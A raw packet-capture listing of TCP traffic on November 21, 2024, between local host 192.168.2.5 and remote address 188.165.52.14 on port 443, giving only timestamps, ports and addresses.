Nov 21, 2024 22:12:22.093864918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.093878984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.093899965 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.099453926 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.099509954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.099543095 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.099550009 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.099575996 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.099596977 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.105020046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.105062962 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.105101109 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.105108023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.105160952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.105181932 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.110009909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.110054970 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.110095024 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.110110044 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.110148907 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.110148907 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.116007090 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.116055012 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.116090059 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.116096973 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.116120100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.116137981 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.222775936 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.222840071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.222944021 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.222960949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.222995996 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.223010063 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.227600098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.227658987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.227673054 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.227680922 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.227714062 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.227736950 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.282638073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.282692909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.282780886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.282795906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.282836914 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.282854080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.287890911 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.287936926 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.288028955 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.288039923 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.288059950 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.288083076 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.293478966 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.293524981 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.293572903 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.293581963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.293617964 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.293646097 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.298554897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.298604012 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.298645020 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.298656940 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.298683882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.298716068 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.304214001 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.304260015 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.304305077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.304313898 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.304359913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.309442997 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.309489965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.309534073 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.309541941 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.309560061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.309582949 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.414772987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.414824009 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.414889097 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.414897919 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.415072918 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.415072918 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.420130014 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.420175076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.420214891 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.420222998 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.420248985 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.420259953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.474622011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.474670887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.474700928 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.474714994 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.474729061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.474761963 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.480031013 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.480086088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.480174065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.480182886 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.480221987 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.485033989 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.485085964 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.485101938 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.485110998 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.485138893 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.485152960 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.490712881 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.490761042 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.490792990 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.490801096 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.490828991 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.490847111 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.496227026 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.496270895 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.496306896 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.496314049 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.496342897 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.496357918 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.501647949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.501691103 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.501718998 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.501727104 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.501745939 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.501764059 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.607186079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.607285023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.607295036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.607322931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.607343912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.607357025 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.612145901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.612190962 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.612222910 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.612231970 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.612256050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.612274885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.666878939 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.666973114 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.667010069 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.667028904 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.667165041 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.667165041 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.672087908 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.672152996 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.672175884 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.672183990 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.672214031 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.672226906 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.677660942 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.677707911 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.677736998 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.677745104 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.677778006 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.677789927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.682637930 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.682681084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.682708979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.682717085 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.682744026 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.682765007 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.688249111 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.688292027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.688323021 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.688329935 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.688358068 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.688369036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.693576097 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.693618059 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.693650961 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.693658113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.693686008 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.693700075 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.799135923 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.799204111 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.799267054 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.799276114 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.799463987 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.804501057 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.804544926 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.804579973 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.804585934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.804609060 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.804629087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.858997107 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.859041929 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.859287024 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.859309912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.859373093 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.864749908 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.864793062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.864839077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.864856005 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.864881992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.864902020 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.869565964 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.869606018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.869645119 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.869658947 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.869688034 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.869710922 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.875078917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.875124931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.875169039 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.875200987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.875224113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.875242949 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.880167007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.880255938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.880259991 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.880285025 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.880316973 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.880328894 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.886046886 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.886089087 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.886116982 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.886125088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.886146069 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.886168003 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.991183996 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.991261005 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.991300106 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.991308928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.991360903 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.996629953 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.996673107 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.996706963 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.996714115 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.996736050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.996757984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.050700903 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.050750971 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.050791025 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.050822973 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.050848007 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.050868034 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.056499004 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.056550026 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.056571960 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.056580067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.056605101 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.056622982 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.061801910 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.061844110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.061885118 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.061892986 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.061932087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.066812992 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.066855907 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.066900015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.066909075 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.066939116 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.066956043 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.072331905 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.072372913 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.072423935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.072432041 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.072459936 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.072474957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.077685118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.077728033 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.077753067 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.077759981 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.077784061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.077801943 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.197931051 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.197987080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.198064089 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.198075056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.198112965 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.198131084 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.203169107 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.203212023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.203248024 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.203254938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.203284979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.203299046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.243099928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.243148088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.243243933 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.243259907 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.243274927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.243300915 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.248188019 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.248230934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.248265028 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.248271942 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.248301029 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.248321056 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.253401041 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.253456116 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.253473997 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.253482103 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.253506899 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.253529072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.259010077 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.259052038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.259088993 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.259095907 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.259124041 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.259143114 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.264806032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.264875889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.264909983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.264930964 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.264945984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.264974117 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.270040989 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.270085096 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.270138979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.270148039 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.270178080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.270195961 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.389975071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.390027046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.390106916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.390127897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.390156984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.390181065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.395515919 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.395561934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.395744085 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.395760059 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.395814896 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.434525967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.434571028 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.434654951 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.434679031 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.434714079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.434743881 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.439992905 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.440037012 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.440083027 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.440100908 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.440140009 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.440140963 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.445655107 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.445697069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.445775986 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.445785046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.445816994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.445816994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.451303959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.451360941 CET	443	49824	188.165.52.14	192.168.2.5
